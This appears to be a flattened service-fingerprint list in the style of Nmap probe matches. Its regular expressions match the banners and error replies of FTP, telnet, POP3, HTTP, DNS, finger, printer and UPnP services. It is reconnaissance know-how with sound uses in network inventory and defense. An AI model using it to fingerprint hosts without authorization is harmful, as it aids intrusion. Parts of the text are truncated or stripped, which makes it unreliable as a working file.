+\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n +\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD +\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: \d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 